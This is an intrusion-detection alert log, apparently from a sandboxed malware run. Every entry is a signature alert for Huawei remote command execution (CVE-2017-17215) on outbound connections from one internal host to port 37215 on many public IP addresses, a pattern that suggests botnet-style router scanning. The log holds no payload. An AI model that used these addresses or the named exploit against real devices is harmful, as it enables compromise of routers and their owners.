                                                    07/10/24-08:27:10.655390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396837215192.168.2.1446.10.199.225
                                                    07/10/24-08:27:28.126957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880437215192.168.2.14197.219.10.226
                                                    07/10/24-08:26:25.453697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540437215192.168.2.14197.84.64.127
                                                    07/10/24-08:26:31.106544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434637215192.168.2.1441.22.183.223
                                                    07/10/24-08:26:36.330025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709837215192.168.2.1441.136.46.85
                                                    07/10/24-08:26:17.974548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097637215192.168.2.14157.25.18.76
                                                    07/10/24-08:26:26.504938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373637215192.168.2.14157.170.82.109
                                                    07/10/24-08:26:38.625504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029437215192.168.2.1441.230.127.35
                                                    07/10/24-08:26:57.665893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182437215192.168.2.14157.179.54.143
                                                    07/10/24-08:26:57.675135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839837215192.168.2.1469.8.129.204
                                                    07/10/24-08:27:07.376255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699637215192.168.2.1441.127.215.20
                                                    07/10/24-08:26:38.520024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406037215192.168.2.14196.243.141.52
                                                    07/10/24-08:26:23.314793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5268237215192.168.2.14119.205.92.1
                                                    07/10/24-08:26:47.999319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366837215192.168.2.1441.229.145.96
                                                    07/10/24-08:26:33.151906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910037215192.168.2.14157.76.184.46
                                                    07/10/24-08:26:34.229660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755437215192.168.2.1418.183.246.170
                                                    07/10/24-08:26:43.799492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058637215192.168.2.1441.1.191.20
                                                    07/10/24-08:27:14.793523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146237215192.168.2.14222.134.143.180
                                                    07/10/24-08:26:38.573652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381437215192.168.2.1441.65.172.243
                                                    07/10/24-08:26:57.665893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600437215192.168.2.14197.247.187.203
                                                    07/10/24-08:26:14.777167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007037215192.168.2.1413.13.212.130
                                                    07/10/24-08:26:53.171769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064237215192.168.2.14197.155.46.167
                                                    07/10/24-08:27:22.882640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019037215192.168.2.1441.169.131.245
                                                    07/10/24-08:27:10.547644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678437215192.168.2.14157.229.215.169
                                                    07/10/24-08:26:45.615423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359437215192.168.2.1448.211.219.23
                                                    07/10/24-08:27:36.290826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686637215192.168.2.14157.89.15.135
                                                    07/10/24-08:26:14.735455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258637215192.168.2.14197.45.77.62
                                                    07/10/24-08:26:15.806534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833237215192.168.2.14157.85.152.252
                                                    07/10/24-08:26:59.807030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259837215192.168.2.14197.117.233.149
                                                    07/10/24-08:26:23.336235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151637215192.168.2.14118.230.64.50
                                                    07/10/24-08:27:02.841622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578637215192.168.2.14120.153.145.196
                                                    07/10/24-08:26:20.186875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434037215192.168.2.1441.124.198.41
                                                    07/10/24-08:27:22.824361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694837215192.168.2.14128.35.19.161
                                                    07/10/24-08:26:49.844556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587437215192.168.2.14157.105.217.65
                                                    07/10/24-08:26:34.245550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999037215192.168.2.14157.124.158.37
                                                    07/10/24-08:27:19.353550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911237215192.168.2.14193.205.155.220
                                                    07/10/24-08:26:20.110888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349037215192.168.2.14157.115.87.176
                                                    07/10/24-08:26:26.605186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846637215192.168.2.1437.23.38.205
                                                    07/10/24-08:26:43.931140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581237215192.168.2.14197.93.101.251
                                                    07/10/24-08:27:24.995730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279837215192.168.2.1441.122.16.71
                                                    07/10/24-08:27:17.041002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957837215192.168.2.14197.127.128.208
                                                    07/10/24-08:27:20.518150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693437215192.168.2.1441.9.133.113
                                                    07/10/24-08:26:11.121414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797637215192.168.2.14197.29.9.130
                                                    07/10/24-08:27:23.947908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918837215192.168.2.1441.103.155.35
                                                    07/10/24-08:26:34.201699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197437215192.168.2.1441.48.239.16
                                                    07/10/24-08:26:28.798485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957637215192.168.2.14157.58.59.176
                                                    07/10/24-08:27:34.122449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130037215192.168.2.14157.46.252.122
                                                    07/10/24-08:26:25.490780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5919037215192.168.2.1441.65.73.52
                                                    07/10/24-08:26:25.456232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018637215192.168.2.1441.175.166.139
                                                    07/10/24-08:27:32.569542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363837215192.168.2.14157.115.78.35
                                                    07/10/24-08:26:53.161125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532237215192.168.2.14157.55.127.206
                                                    07/10/24-08:26:14.762388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4281237215192.168.2.14197.150.149.204
                                                    07/10/24-08:27:34.117875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298237215192.168.2.14157.47.116.196
                                                    07/10/24-08:26:23.354266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370437215192.168.2.1441.52.216.117
                                                    07/10/24-08:26:48.020359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440237215192.168.2.14157.114.105.124
                                                    07/10/24-08:26:49.802588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857837215192.168.2.14197.27.224.2
                                                    07/10/24-08:27:17.027039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5393637215192.168.2.1441.3.79.212
                                                    07/10/24-08:27:32.507738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859637215192.168.2.1458.254.254.244
                                                    07/10/24-08:26:28.897844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415437215192.168.2.14183.233.235.178
                                                    07/10/24-08:26:45.684661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445437215192.168.2.14157.242.164.127
                                                    07/10/24-08:26:18.038406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727237215192.168.2.14157.112.39.247
                                                    07/10/24-08:27:23.900163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5665437215192.168.2.14197.228.203.101
                                                    07/10/24-08:26:55.457969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883437215192.168.2.1441.148.198.203
                                                    07/10/24-08:26:59.771211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753037215192.168.2.14157.53.39.174
                                                    07/10/24-08:26:23.302644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044237215192.168.2.14157.225.120.7
                                                    07/10/24-08:27:22.483673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105437215192.168.2.14157.67.183.57
                                                    07/10/24-08:26:36.377315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464637215192.168.2.14197.129.225.199
                                                    07/10/24-08:26:28.736673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837037215192.168.2.14157.29.17.185
                                                    07/10/24-08:26:33.221493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804237215192.168.2.14223.66.224.45
                                                    07/10/24-08:27:27.041359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141037215192.168.2.14157.108.15.229
                                                    07/10/24-08:26:26.483196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123037215192.168.2.1441.91.124.245
                                                    07/10/24-08:26:33.175364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729237215192.168.2.14157.208.22.99
                                                    07/10/24-08:27:31.526473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047237215192.168.2.14197.154.7.204
                                                    07/10/24-08:27:02.982292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749037215192.168.2.14202.80.130.53
                                                    07/10/24-08:26:43.896757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021637215192.168.2.14107.157.80.136
                                                    07/10/24-08:26:49.904886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258637215192.168.2.1441.120.169.203
                                                    07/10/24-08:27:05.230941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658437215192.168.2.1493.235.95.130
                                                    07/10/24-08:26:17.959053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295637215192.168.2.1441.156.242.243
                                                    07/10/24-08:26:34.238024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465037215192.168.2.1441.16.105.84
                                                    07/10/24-08:26:41.419620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132237215192.168.2.1441.207.16.231
                                                    07/10/24-08:26:13.805292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644437215192.168.2.14175.196.176.13
                                                    07/10/24-08:26:38.625504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050037215192.168.2.14157.213.169.228
                                                    07/10/24-08:27:08.446454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824837215192.168.2.1441.172.226.80
                                                    07/10/24-08:26:43.647705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872437215192.168.2.14197.37.222.77
                                                    07/10/24-08:27:05.135511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902637215192.168.2.14157.74.116.34
                                                    07/10/24-08:27:14.026941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178637215192.168.2.1451.233.164.173
                                                    07/10/24-08:26:33.151266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669237215192.168.2.1441.203.105.89
                                                    07/10/24-08:27:02.848465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966237215192.168.2.1441.1.60.122
                                                    07/10/24-08:26:43.875785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345237215192.168.2.1441.234.53.42
                                                    07/10/24-08:27:20.414993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895037215192.168.2.1441.26.60.237
                                                    07/10/24-08:26:59.701183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118637215192.168.2.14157.202.193.68
                                                    07/10/24-08:27:05.058899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372837215192.168.2.1441.94.254.73
                                                    07/10/24-08:26:18.028989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440637215192.168.2.14157.228.238.15
                                                    07/10/24-08:26:51.979594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463837215192.168.2.1441.55.10.106
                                                    07/10/24-08:26:29.872230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794037215192.168.2.1441.132.158.78
                                                    07/10/24-08:26:57.610016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014437215192.168.2.14157.36.50.133
                                                    07/10/24-08:27:16.994273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5076437215192.168.2.14197.141.181.232
                                                    07/10/24-08:26:38.535955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798237215192.168.2.1441.246.144.212
                                                    07/10/24-08:26:25.467970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924837215192.168.2.14157.114.180.47
                                                    07/10/24-08:27:23.773863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6075637215192.168.2.14183.165.74.79
                                                    07/10/24-08:26:11.167098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718637215192.168.2.1441.216.54.185
                                                    07/10/24-08:27:14.800548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463037215192.168.2.1441.87.167.99
                                                    07/10/24-08:26:33.217883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273437215192.168.2.1441.18.85.202
                                                    07/10/24-08:26:57.521887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999837215192.168.2.14157.35.212.228
                                                    07/10/24-08:27:05.138927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516837215192.168.2.14172.127.175.165
                                                    07/10/24-08:27:13.721350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042637215192.168.2.14197.145.119.131
                                                    07/10/24-08:26:57.505236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703437215192.168.2.14197.7.199.153
                                                    07/10/24-08:27:10.617343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948237215192.168.2.14197.180.108.111
                                                    07/10/24-08:27:17.088022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768837215192.168.2.1441.119.16.66
                                                    07/10/24-08:26:41.436580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386637215192.168.2.14157.59.173.135
                                                    07/10/24-08:27:22.812870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234637215192.168.2.14116.225.4.197
                                                    07/10/24-08:27:10.530292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926437215192.168.2.14197.165.89.245
                                                    07/10/24-08:27:11.496514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536837215192.168.2.1441.247.83.205
                                                    07/10/24-08:27:07.366648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672237215192.168.2.14197.54.223.95
                                                    07/10/24-08:26:36.381713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689837215192.168.2.14157.206.62.91
                                                    07/10/24-08:27:07.393552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887037215192.168.2.14197.196.79.168
                                                    07/10/24-08:27:19.234449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132437215192.168.2.1441.164.127.114
                                                    07/10/24-08:26:31.098098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165637215192.168.2.1457.224.117.16
                                                    07/10/24-08:27:17.088792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4058437215192.168.2.1481.113.47.191
                                                    07/10/24-08:27:10.672315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787837215192.168.2.14177.223.228.60
                                                    07/10/24-08:27:17.054152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638237215192.168.2.1441.223.14.126
                                                    07/10/24-08:26:43.891312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469637215192.168.2.14197.107.13.222
                                                    07/10/24-08:26:31.084469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005037215192.168.2.1458.66.213.201
                                                    07/10/24-08:26:33.266829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296637215192.168.2.1441.50.171.27
                                                    07/10/24-08:27:22.896785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084837215192.168.2.14197.37.218.251
                                                    07/10/24-08:27:10.537865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047637215192.168.2.14197.215.176.178
                                                    07/10/24-08:27:02.985311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354837215192.168.2.1441.220.89.120
                                                    07/10/24-08:26:55.372115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975037215192.168.2.1441.228.180.44
                                                    07/10/24-08:26:42.419623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725837215192.168.2.1441.52.207.222
                                                    07/10/24-08:27:34.120553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347837215192.168.2.14124.218.109.145
                                                    07/10/24-08:27:24.981965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266637215192.168.2.14197.59.117.157
                                                    07/10/24-08:26:11.156956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730037215192.168.2.14173.121.75.210
                                                    07/10/24-08:27:23.969941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772437215192.168.2.14196.116.92.93
                                                    07/10/24-08:26:31.065824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221237215192.168.2.14157.33.156.238
                                                    07/10/24-08:27:22.772225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370037215192.168.2.14157.219.35.158
                                                    07/10/24-08:27:32.572327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355237215192.168.2.14197.64.29.195
                                                    07/10/24-08:27:24.985938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064437215192.168.2.14157.92.59.231
                                                    07/10/24-08:26:55.297607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792237215192.168.2.14157.133.119.219
                                                    07/10/24-08:27:22.835700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663837215192.168.2.1441.251.75.54
                                                    07/10/24-08:26:48.013030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569237215192.168.2.1441.145.195.79
                                                    07/10/24-08:27:33.863789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267637215192.168.2.1441.221.117.41
                                                    07/10/24-08:27:28.182611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025237215192.168.2.1458.13.215.18
                                                    07/10/24-08:26:17.972432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825037215192.168.2.14197.39.0.105
                                                    07/10/24-08:26:18.008169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783437215192.168.2.14197.60.169.214
                                                    07/10/24-08:26:41.570262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338237215192.168.2.14173.228.193.112
                                                    07/10/24-08:27:05.077819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806637215192.168.2.14157.202.2.80
                                                    07/10/24-08:26:22.298468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941837215192.168.2.14157.193.111.159
                                                    07/10/24-08:27:13.800580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188637215192.168.2.14182.73.34.120
                                                    07/10/24-08:27:23.914587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284437215192.168.2.1441.179.84.199
                                                    07/10/24-08:26:33.243184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150237215192.168.2.14157.168.54.175
                                                    07/10/24-08:26:14.817942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035837215192.168.2.14173.74.178.59
                                                    07/10/24-08:26:45.651870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434437215192.168.2.1490.217.43.116
                                                    07/10/24-08:26:11.149960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720637215192.168.2.14197.60.100.141
                                                    07/10/24-08:26:45.587142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544237215192.168.2.14201.40.158.253
                                                    07/10/24-08:26:20.157992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787437215192.168.2.14115.161.209.177
                                                    07/10/24-08:26:36.336405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964637215192.168.2.1441.39.224.102
                                                    07/10/24-08:26:31.062552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406637215192.168.2.14197.100.23.20
                                                    07/10/24-08:26:38.598886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440837215192.168.2.14197.112.13.188
                                                    07/10/24-08:27:05.109463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304037215192.168.2.1477.194.221.5
                                                    07/10/24-08:26:11.609085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4967037215192.168.2.1441.172.189.79
                                                    07/10/24-08:26:47.931064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344237215192.168.2.1441.39.250.70
                                                    07/10/24-08:26:55.373559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.149.83.115.90
                                                    07/10/24-08:26:13.805292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790037215192.168.2.14157.66.37.83
                                                    07/10/24-08:26:47.783932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814037215192.168.2.14191.136.81.239
                                                    07/10/24-08:27:23.956633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500837215192.168.2.14157.135.147.217
                                                    07/10/24-08:26:17.941159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130237215192.168.2.1441.242.188.127
                                                    07/10/24-08:27:10.635784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442637215192.168.2.1441.81.19.124
                                                    07/10/24-08:27:17.061013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522837215192.168.2.1441.239.70.56
                                                    07/10/24-08:26:28.911509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214237215192.168.2.1493.249.7.96
                                                    07/10/24-08:26:47.933243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4606437215192.168.2.14151.135.124.115
                                                    07/10/24-08:26:49.761554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592437215192.168.2.14197.117.135.131
                                                    07/10/24-08:27:11.527475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516837215192.168.2.1441.138.66.107
                                                    07/10/24-08:26:59.595205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956437215192.168.2.14197.168.67.163
                                                    07/10/24-08:27:10.599679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501837215192.168.2.14197.43.161.81
                                                    07/10/24-08:26:13.745015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656637215192.168.2.14197.103.201.75
                                                    07/10/24-08:27:10.670765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811837215192.168.2.14157.100.88.144
                                                    07/10/24-08:27:30.411033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679837215192.168.2.1441.216.83.167
                                                    07/10/24-08:27:23.905931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639637215192.168.2.1441.145.146.237
                                                    07/10/24-08:27:27.083011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468637215192.168.2.1441.65.34.205
                                                    07/10/24-08:27:30.416774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743437215192.168.2.14197.27.205.11
                                                    07/10/24-08:27:10.556595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069437215192.168.2.14197.37.12.164
                                                    07/10/24-08:26:41.397697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761237215192.168.2.14157.41.176.75
                                                    07/10/24-08:27:14.885760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14197.67.77.227
                                                    07/10/24-08:26:41.476455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315037215192.168.2.1441.148.192.109
                                                    07/10/24-08:27:33.881994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269037215192.168.2.14157.75.8.200
